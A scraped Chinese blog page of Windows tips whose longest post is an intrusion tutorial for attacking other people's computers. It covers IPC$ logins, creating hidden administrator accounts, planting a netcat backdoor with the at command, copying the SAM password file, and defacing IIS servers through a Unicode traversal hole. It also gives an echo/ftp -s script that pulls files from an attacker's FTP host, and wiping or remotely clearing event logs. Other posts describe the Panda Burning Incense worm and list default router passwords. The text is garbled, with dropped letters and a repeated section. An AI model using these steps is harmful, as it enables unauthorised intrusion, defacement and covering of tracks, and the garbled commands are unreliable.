信息提示
您的同一ip请求过于频繁,如果希望继续访问,请输入验证码:
Copyright 1998 – 2010 Tencent. All Rights Reserved.流星雨QQ181798524
关于作者
用户名:scd1986
笔名:流星雨
湖北-洪湖
日历
快速登录
+ 用户名:
+ 密 码:
快速浏览
最新文章
•
•
•
•
•
•
•
•
•
•
文章索引
在线留言
最新评论
访问统计:
文章个数:40
评论个数:60
留言条数:25
流星雨QQ181798524
欢迎访问舒昌栋的博客QQ181798524
快速启动栏的“显示桌面”按钮是大家经常用到的操作按钮,有时误删除掉后,然后使用起来非常不方便,其实这时我们可以同时按下Win+D键来“显示桌面”,如果使用不习惯,需要恢复此按钮,可以点击“开始→运行”,在弹出的“运行”对话框中输入“REGSVR32 /n /i:u shell32”(不含双引号),然后回车,片刻后会弹出“shell32中的DllI tall成功”对话框,“显示桌面”按钮就可以完美归来了。 你也可以打开“记事本”程序,在其中输入: “[Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop”(不含双引号),然后保存为显示桌面.scf(含半角英文双引号),再将它拖到快速启动栏中便可。
- 作者:
2007年02月7日, 星期三 15:38
病毒名称:Worm.WhBoy.h
病毒中文名:熊猫烧香(武汉男生)
病毒类型:蠕虫
危险级别:★★★★★
影响平台:Win 9x/ME,Win 2000/NT,Win XP,Win 2003
专杀工具: 病毒描述:
“武汉男生”,俗称“熊猫烧香”,这是一个感染型的蠕虫病毒,它能感染系统中exe,com,pif,src,html,a 等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件,使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。
1:拷贝文件
病毒运行后,会把自己拷贝到C:\WINDOWS\System32\Drivers\ oclsv.exe
2:添加注册表自启动
病毒会添加自启动项HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare - C:\WINDOWS\System32\Drivers\ oclsv.exe
3:病毒行为
a:每隔1秒寻找桌面窗口,并关闭窗口标题中含有以下字符的程序:
QQKav、QQ***、防火墙、进程、VirusScan、网镖、杀毒、毒霸、瑞星、江民、黄山IE、超级兔子、优化大师、木马克星、木马清道夫、QQ病毒、注册表编辑器、系统配置实用程序、卡巴斯基反病毒、Symantec AntiVirus、Duba、esteem proces、绿鹰PC、密码防盗、噬菌体、木马辅助查找器、System Safety Monitor、Wra ed gift Killer、Wi ock Expert、游戏木马检测大师、msctls_statu ar32、pjf(ustc)、IceSword
并使用的键盘映射的方法关闭安全软件IceSword
添加注册表使自己自启动 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run svcshare - C:\WINDOWS\System32\Drivers\ oclsv.exe
并中止系统中以下的进程:
Mcshield.exe、VsTskMgr.exe、naPrdMgr.exe、UpdaterUI.exe、TBMon.exe、scan32.exe、Ravmond.exe、CCenter.exe、RavTask.exe、Rav.exe、Ravmon.exe、RavmonD.exe、RavStub.exe、KVXP.kxp、kvMonXP.kxp、KVCenter.kxp、KVSrvXP.exe、KRegEx.exe、UIHost.exe、TrojDie.kxp、FrogAgent.exe、Logo1_.exe、Logo_1.exe、Rundl132.exe
b:每隔18秒点击病毒作者指定的网页,并用命令行检查系统中是否存在共享,共存在的话就运行net share命令关闭admin$共享
c:每隔10秒下载病毒作者指定的文件,并用命令行检查系统中是否存在共享,共存在的话就运行net share命令关闭admin$共享
d:每隔6秒删除安全软件在注册表中的键值
并修改以下值不显示隐藏文件 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue - 0x00
删除以下服务:
nava vc、wscsvc、KPfwSvc、SNDSrvc、ccProxy、ccEvtMgr、ccSetMgr、SPBBCSvc、Symantec Core LC、NPFMntor MskService、FireSvc
e:感染文件
病毒会感染扩展名为exe,pif,com,src的文件,把自己附加到文件的头部,并在扩展名为htm,html, a ,php,j ,a x的文件中添加一网址,用户一但打开了该文件,IE就会不断的在后台点击写入的网址,达到增加点击量的目的,但病毒不会感染以下文件夹名中的文件:
WINDOW、Wi t、System Volume Information、Recycled、Windows NT、WindowsUpdate、Windows Media Player、Outlook Expre 、Internet Explorer、NetMeeting、Common Files、ComPlus A licatio 、Me enger、I tallShield I tallation Information、MSN、Microsoft Frontpage、Movie Maker、MSN Gamin Zone
g:删除文件
病毒会删除扩展名为gho的文件,该文件是一系统备份工具GHOST的备份文件使用户的系统备份文件丢失。
- 作者:
2007年01月26日, 星期五 18:30
路由器品牌 默认IP 默认帐号 默认密码
TP LINK TD8800 192.168.1.1 root root
TPLINK 8830 192.168.10.200 root Root
TP LINK R410 192.168.1.1 admi admin
中心831 192.168.1.1 ZXDSL ZXSDL
Cyrix686 D-link dt704 192.168.0.1 admi admin
D-link dsl-500 10.1.1.1 admi admin
腾达TED8620 192.168.1.1 admi admin
阿尔法特 10.0.0.138 root root
SPEEDTOUCH 500 10.0.0.138 admi admin
to tar 顶星TE-SR400 192.168.62.1 admi admin
eTEK 伊泰克 TD-2001 192.168.1.1 admi admin
神州数码/华硕:
用户名:adsl 密码:adsl1234
用户名:root 密码:root
用户名:putia 密码:123456
用户名:admi 密码:12345
用户名:anonymou 密码:1234
用户名:anonymou 密码:12345
用户名:admi 密码:admin
用户名:admi 密码:1234
用户名:root 密码:root
用户名:user 密码:user
用户名:adsl 密码:adsl831
四川天邑信息科技股份有限公司 HASB-100 CX82310-14 桥接+路由 10.0.0.2 admin admin/epicrouter.o
HASB-100 CX82310-14 桥接 10.0.0.2 admin admin/epicrouters
神州数码(中国)网络有限公司 DCAD-6010RA V6 Globe Span 桥接+路由 192.168.1.1 admin admin12346
DCAD-6010RA V5 ADI 桥接 192.168.1.1 admin admin1234H
福建星网锐捷通讯有限公司 ADSL2110EH Globe Span 桥接+路由 192.168.10.1 root/admin root/adminld^
上海大亚科技有限公司 DB102/108 Globe Span 桥接+路由 192.168.1.1 admin dare6iv
DB102/108 ADI 桥接 192.168.1.1 admin dareh.3
北方科迈易通科技有限公司 KM300A-A/G GSI/ADI 桥接+路由 192.168.1.1 admin/root root/123456i@
上海中达电通股份有限公司 CT500-R TI/Globe Span 桥接+路由 192.168.1.1 root 12345C
CT500-B ADI 桥接 192.168.1.1 root 12345Y
华为技术有限公司 MT800 Globe Span 桥接+路由 192.168.1.1 admin admin/epicrouter
MT800 Globe Span 桥接 192.168.1.1 admin admin/epicrouter
深圳中兴通讯股份有限公司 ZXDSL831 BroadCom 桥接+路由 192.168.1.1 ZXDSL ZXDSL~nd
ZXDSL831B TI/Globe Span 桥接 192.168.1.1 ZXDSL ZXDSLi
KM300A-AB ADI 桥接 192.168.1.1 admin/root root/123456?w
ADSL2110EH ADI 桥接 192.168.10.1 root/admin root/admi am D*Sy
深圳银河信息产业有限公司 AAM6000EV(华硕) Globe Span 桥接+路由 192.168.1.1 adsl adsl1234*K;a
AAM6000EV(华硕) ADI 桥接 192.168.1.1 adsl adsl1234R^@!O
港湾网络有限公司 HA1000-TR Globe Span 桥接+路由 192.168.1.1 admin harbour-
HA1000-TR ADI 桥接 192.168.1.1 admin harbourWz.
普天和信网络技术有限公司 ISIN6161-RT Globe Span 桥接+路由 192.168.1.1 putian 123456HVK
ISIN6161-BE Globe Span 桥接 192.168.1.1 putian 1234567#
UT斯达康(中国)有限公司 UT-300R Globe Span 桥接+路由 192.168.1.1 admin utstarqg~I28
UT-300R ADI 桥接 192.168.1.1 admin utstar
深圳格林耐特通信技术有限公司 GRT1500R GS8120/GS3780 桥接+路由 192.168.1.1 root 12345
GRT1500 AD6485/AD6488 桥接 192.168.1.1 root 12345
友讯电子有限公司 DSL-500 Conexant 桥接+路由 192.168.1.1 admin admin
DSL-200 ADI 桥接 192.168.1.1 admin admin
南京斯维特新技术创业有限公司 SLA8000D ADI 桥接+路由 192.168.1.1 root root
SLA8000 ADI 桥接 192.168.1.1 root root
SVT508 ADI 桥接+路由 192.168.1.1 root root
深圳探索者数码科技有限公司 KD318 Globe Span 桥接+路由 10.0.0.2 admin conexant
KD318 Conexant 桥接 10.0.0.2 admin conexant
北京全创通讯设备有限公司 Acce Linker 1100 Conexant 桥接+路由 10.0.0.2 admin epicroute
Acce Linker 1100 Conexant 桥接 10.0.0.2 admin epicrouter
北京金瑞迪网络技术有限公司 RA-800 Router AD 桥接+路由 192.168.1.1 root 123458U\
RA-800 Modem AD 桥接 192.168.1.1 root 12345x0Jy
长虹ch-500E 192.168.1.1 username:root pa word:root
重庆普天CP ADSL03 192.168.1.1 username:root pa word:root
cewetek-td的ADSL_T07L006.0 192.168.1.1 User Name: supervisor Pa word: 12345
同维DSL699E 192.168.1.1 用户名:root 密码:root
Ecom ED-802EG 在IE输入192.168.1.1,用户名和密码都为root
全向QL1680 IP地址10.0.0.2,用户名:admin,密码:qxcomm1680
全向QL1880 IP地址192.168.1.1,用户名:root,密码:root
全向QL1688 IP地址10.0.0.2,用户名为admin;密码为qxcomm1688
TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin
合勤zyxel 642 在运行输入telnet 192.168.1.1 密码1234
上海阿尔卡特 HOME PLUS 511 桥接+路由 10.0.0.138
路由品牌名:viking
帐号:adsl 密码:adsl1234
帐号:root 密码:grouter
路由默认密码
部分的ADSL路由器默认帐号密码
艾玛 701g
192.168.101.1 192.168.0.1
用户名:admi 密码:admin
用户名:SZIM 密码:SZIM
艾玛701H
192.168.1.1 10.0.0.2
用户名:admin 密码:epicrouter
home gateway
路由的IP是:10.0.0.2
管理名:admi 密:epicrouter
实达2110EH ROUTER
192.168.10.1
用户名:user 密码:pa word
用户名:root 密码:grouter
神州数码/华硕:
用户名:adsl 密码:adsl1234
用户名:root 密码:root
用户名:admin 密码:dare
用户名:admin 密码:12345
用户名:anonymou 密码:1234
用户名:anonymou 密码:12345
用户名:admi 密码:admin
用户名:admi 密码:1234
用户名:root 密码:root
用户名:user 密码:user
- 作者:
2006年10月30日, 星期一 09:31
XP在DOS下添加用户
net user lxy 123456 /add (可以随意设置用户和密码)
前句话是把lxy这个用户添加到工作组中`密码为123456
net localgroup administrator lxy /add
这句话是把lxy这个用户给予系统管理员权限
- 作者:
2006年10月8日, 星期日 14:06
直接进入带命令提示的安全模式
在DOS下输入:
输入“net user administrator /active:yes”,或者是激活你原来使用的帐号“net user 帐号名 /active:yes”,当显示“命令完成时”关闭cmd.exe
然后重启电脑就行
- 作者:
2006年10月8日, 星期日 14:04
点击“收藏夹”这个文件夹,在左边的“文件和文件夹任务”-移动这个文件夹-到你要的位置就可以了。
- 作者:
2006年10月8日, 星期日 12:35
今天,我给大家说说不用分区,如何增加本地磁盘。
增加本地磁盘有什么用啊?朋朋友会这样问。
对!问得好呀。
答:一般我们的硬盘总分成4-6或更多的盘,用来分门别类。好比:C盘为系统盘,D盘为游戏盘,E盘为MP3盘,F盘为电影盘,G盘为工具盘。
事实上,可能这几个盘是不够用的呀。最且,就工具里有电影,电影里有工具,来个大杂烩,想用得时候却找不到了。你说是不?
这样,你可能就要增加磁盘了。
啊?然道我还要重新分区吗?
不用的。只要你跟我一起做就行了。COME ON。
来吧。对了,我们先来建立一个文件夹吧。好比在E盘下。
我的E盘副本,你们看到的这个盘就是我刚建立的盘。
好,来看看CMD。
用这个命令:su t
好比,我们要做一个“我的E盘副本”
看:su t m: e:\我的E盘副本
建立一个M盘。
来看一下,是不是有这个M盘了。有了。打开看看。
空的,我们来往里面放东东。
- 作者:
2006年07月21日, 星期五 12:58
网络经典命令行
1.最基本,最常用的,测试物理网络的
ping 192.168.10.88 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\> lookup
Default Server: .hesjptt.net.cn
Addre : 202.99.160.68
> erver 202.99.41.2 则将DNS改为了41.2
pop.pcpop.com
Server: .hesjptt.net.cn
Addre : 202.99.160.68
Non-authoritative a wer:
Name: pop.pcpop.com
Addre : 202.99.160.212
3.网络信使
Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段
net stop me enger 停止信使服务,也可以在面板-服务修改
net start me enger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名
ping -a IP -t ,只显示NetBios名 tstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP:
ARP -s 192.168.10.59 00-50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\> et view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: 2.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net se ion
C:\> et se ion
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
2.168.10.110 ROME Windows 2000 2195 0 00:03:12
2.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
netshint
interfaceip
interface i gt et add 本地链接 static IP地址 mask gateway
B.查看IP设置
interface i gt how addre 测试mtu
ping -f -l size 服务器ip
偶们最常用咯^_^
入侵命令详解
--------------------------------------------------------------------------------
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1
net use 7.0.0.1\ipc$ 123456 /user:hbx null密码为空
退出的命令是
net use 7.0.0.1\ipc$ /delete
--------------------------------
net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:\wi t\system32
这样这个机器就有了一个名为me的共享目录,而打开它就是wi t下的system32目录,如果你用win2000的系统就知这个目录有多重要了,如果不想要也好办net
share me /delete 呵呵,没有了,是不是很方便的埃
---------------------- ----------------------
----------------------
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
---------------------- ----------------------
----------------------
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
----------------------
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z:7.0.0.1\c$
----------------------
net start telnet
这样可以打开对方的TELNET服务.
----------------------
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes
----------------------
net user guest /active:no这样这个guest的用户就又被禁用了
----------------------
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
有人问到提高权限的问题 下面就解决下
net localgroup administrators guest /add
将guest变为administrator
net命令果然强大啊! net view命令看对方开了共享
-------------------------------------------------------------------------------------------------------------
net user是查看所有用户列表,看看哪个用户是和你一样偷跑进来的,给他名给删掉,让他美,net user 用户名
/delete哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net
localgroup
administrators就列出管理员组成员了,再查看一下administrator这个用户,因为这个是创建系统时建出来的,所以要看看他的系统是什么时间创建出来的
net user
administrator,然后再查看别的管理员用户是什么时间创建的,如果相差太远,那可能是被别人偷偷跑来偷建的,一律del,安全第一哦................
----------------------------------------------------------------------------------------------------------------------
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
----------------------
你首先要得到对方的时间,
net time 7.0.0.1
----------------------
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at 7.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
-----------------------------------------------------
at命令功能强大,下面可以打个比方:
C:\ AT 22:30 Start C:\prettyboy.mp3
新加了一项作业,其作业 ID = 1 [现在我们新建立了一个任务 在22:30分 系统将自动播放歌曲]
----------------------------------------------------------------------------------------------------------------------
3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
----------------------------------------------------------------------------------------------------------------------
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我WWW.51.NET,不错的.当我们申请完后,...?约癋TP服务器.
在上传前需要登陆先,这里我们假设FTP服务WWW.51.NET,用户名是HUCJS,密码是654321
ftp www.51.net
他会要求输入用户,成功后会要求输入密码.
----------------------
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\
get c:\index.htm d:\
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
put c:\index.htm d:\
--------------------------------------------------
这里的问题是两个命令的解释正好弄反了,登陆FTP服务器后get才是下载,而put命令是上传,这和tftp的命令正好相反,在tftp命令里get是上传put是下载,这下明白了吧,而且在FTP服务器中不能用c:\和d:\这样来指明路径,这也是在tftp里面用的方法,FTP可不会执行的,不信你去试好了,正确应该这样上传文件put
index.htm这样就足够了,装c盘根目录下的index.htm文件上传到FTP服务器的当前目录下,不喜欢就del
index.htm删掉这文件,下载时先查看一下目录,dir然后看这个目录里有什么,有你要的你就get
index.htm这样就把index.htm这个文件下载到你自己的c盘根目录下了。
--------------------------------------------------------------
get index.htm
c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
这句的解释里就没有出现错误,呵呵,看来那以前的还是马虎所至吧
好了,总算找出错处了吧,再说下面吧。
----------------------------------------------------------------------------------------------------------------------
下面我说说怎样把本地的文件复制到对方硬盘上去, 需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
copy index.htm 7.0.0.1\c$\index.htm
----------------------
如果你要复制到D盘下 把C改为D, 就行了!
copy index.htm 7.0.0.1\d$\index.htm
----------------------
如果你要把他复制到 WINNT 目录里
就要把输入
copy index.htm 7.0.0.1\admin$\index.htm
admin$是wi t
---------------------
要把对方的文件复制过来,顺便告诉大家 NT的备份的数据库放在x:\wi t\repair\sam._ sam._是数据库的文件名
---------------------- ----------------------
下面就把127.0.0.1的数据库复制到本地C盘下
copy 7.0.0.1\admin$\repair\sam._ c:\
这个sam._这明显是NT主机的口令档,如果是win2000机器的口令文件应该是sam
----------------------------------------------------------------------------------------------------------------------
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!
下面是我得到的结果!我来分析它,只是找主页在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Ste ing 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
script_NAME=/scripts/..%2f../wi t/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT
粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。
----------------------------------------------------------------------------------------------------------------------
7: tstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!
现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。
命令是 tstat -A XX.XX.XX.XX
-A一定要大写哦。
这个我认为大不大写没有太大差别,用处还是一样的。
之后用net use \对方IP 连接一下!
net view \对方IP 查看对方共享文件夹
net use X: \IP\对方共享文件 映射对方共享文件夹成为本机的X盘
这就是139端口的基本用法!不过前提是必须对方开共享!
netstat -n看看谁连接你
-----------------
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered
Registered Reg
istered Registered Registered Registered
MAC Addre = 00-E0-29-14-35-BA
PENTIUMII 00 UNIQUE
PENTIUMII 20 UNIQUE
ORAHOTOWN 00 GROUP
ORAHOTOWN 1C GROUP
ORAHOTOWN 1B UNIQUE
PENTIUMII 03 UNIQUE
INet~Services 1C GROUP
IS~PENTIUMII...00 UNIQUE
ORAHOTOWN 1E GROUP
ORAHOTOWN 1D UNIQUE
..__MSBROWSE__.01 GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是 03 的话,那他前面的就是用户.
这里的用户是PENTIUMII。
没有03说明:MAC没和IP捆在一起了
----------------------------------------------------------------------------------------------------------------------
8:Shutdown
关了对方的NT服务器的命令
Shutdown \IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。
Telnet进去用命令或者是本地用什么软件重启对方电脑
shutdown -m \计算机名称 可以远程重起或关闭的
--------------------------------------------------------------------------------
这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。
你可以本地试下。
--------------------------------------------------------------------------------
10:echo
著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。
我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖1写入index.htm,有2种方法,大家看看有什么区别。
-------------------------------------------------------
echo 南京大屠杀铁证如山,任何日本人不得抵赖!index.htm
echo 南京大屠杀铁证如山,任何日本人不得抵赖!index.htm
-------------------------------------------------------
第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖1写进index.htm。
第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖1加到index.htm里面。
-------------------------------------------------------
“”产生的内容将追加进文件中,“”则将原文件内容覆盖。
这里说明一下,和是重定向命令只是一个是输入重定向另一个是输出重定向,比如我们在命令提示符下就会显示c:\这个意思就是把C盘的命令权重定向给我们,同样:也是定向的命令也叫作管道,它是用来连接两个命令的管道,先执行管道左边的命令,再执行管道右边的命令,不过我是没能耐把DOS命令说明白的,想研究就买本dos大全看吧,够看半年的了。
-------------------------------------------------------
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm
c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
---------------------------------------------
具体的做法:
输入 echo open upload.chinaren.com c:\cnhack.txt
输入 echo cnhack c:\cnhack.txt
输入 echo 39a c:\cnhack.txt
输入 echo get index.htm
c:\inetpub\wwwroot\index.htm++c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。)
等命令完成时,文件已经下载到你指定的文件里了。
-----------------------
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)
记得要 del c:\cnhack.txt
--------------------------------------------------------------------------------
11:attrib
这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。
attrib -r index.htm
这个命令是把index.htm的只读属性去掉。
如果把“-”改为“+”则是把这个文件的属性设置为只读
----------------------
attrib +r index.htm
这个命令是把index.htm的属性设置为只读。
----------------------------------------
attrib这个命令先要用来查属性,比如attrib 文件名,这样就显示出这个文件的属性了,它不止有R这个属性,其实一共有四种属性,
a 档案属性 r 只读属性 h隐含属性
s系统属性,我们想用哪个就用哪个,我觉得把我们上传的文件加个隐含属性更有意思,,,,,继续挑那贴的错.
----------------------------------------------------------------------------------------------------------------------
当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。
NT的日志有这些
del C:\wi t\system32\logfiles\*.*
del C:\wi t\ ytem32\config\*.evt
del C:\wi t\system32\dtclog\*.*
del C:\wi t\system32\*.log
del C:\wi t\system32\*.txt
del C:\wi t\*.txt
del C:\wi t\*.log
只要删除这些就可以了。有些系统NT***在D盘或其他盘,就要把C改成其他盘。
Internet信息服务FTP日志默认位置:%systemroot%\system32\logfiles\msft vc1\,默认每天一个日志
Internet信息服务WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志
Scheduler服务日志默认位置:%systemroot%\schedlgu.txt
以上日志在注册表里的键:
应用程序日志,安全日志,系统日志,DNS服务器日志,它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Eventlog
有的管理员很可能将这些日志重定位。其中EVENTLOG下面有很多的子表,里面可查到以上日志的定位目录。
Schedluler服务日志在注册表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent
--------------------------------------------------------------------
del确实是删除文件用的,log也确实是日志文件类型,不过按上面这种方法是不可能清理掉你自身的日志的,因为系统自动运行着日志记录,你在做这些时它一直都在记录着,并没有停止,大家也会常看到,有时删除某个文件时会提示系统正在占用拒绝删除的,呵呵,这就明白了,系统正在运行的东西已经驻留内存里,当然不能这样删除掉了,大家怕了吧,这样删等于帮别人清理了日志,没删自己那份啊,哈哈哈哈,要问我怎么清理,我只说大家还是用小榕的工具来清吧,那个又快又好,我们何必去用那些烦琐的命令行呢,尤其对生长在windows桌面操作下的人们那显然是太麻烦了,我推荐小榕的elsave工具,清理日志又快又干净,还省电呢,嘻嘻,我可不是做广告来的。
-------------------------------------------------------------------------
借助第三方工具:如小榕的elsave.exe远程清除system,a licaton,security的软件,
使用方法很简单,首先利用获得的管理员账号与对方建立ipc会话,net use \ip pa /us
er: user
然后命令行下:elsave -s \ip -l a lication -C,这样就删除了安全日志。
其实利用这个软件还可以进行备份日志,只要加一个参数 -f filename就可以了,在此不再详述。
--------------------------------------------------------------------------------局域网要别人死机?
他C盘开了共享的话(win98,而且没有打补丁),你在DOS下输入
\他的IP或机器名\c\con\con
网络经典命令行
1.最基本,最常用的,测试物理网络的
ping 192.168.10.88 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\> lookup
Default Server: .hesjptt.net.cn
Addre : 202.99.160.68
> erver 202.99.41.2 则将DNS改为了41.2
pop.pcpop.com
Server: .hesjptt.net.cn
Addre : 202.99.160.68
Non-authoritative a wer:
Name: pop.pcpop.com
Addre : 202.99.160.212
3.网络信使
Net send 计算机名/IP|* (广播) 传送内容,注意不能跨网段
net stop me enger 停止信使服务,也可以在面板-服务修改
net start me enger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名
ping -a IP -t ,只显示NetBios名 tstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP:
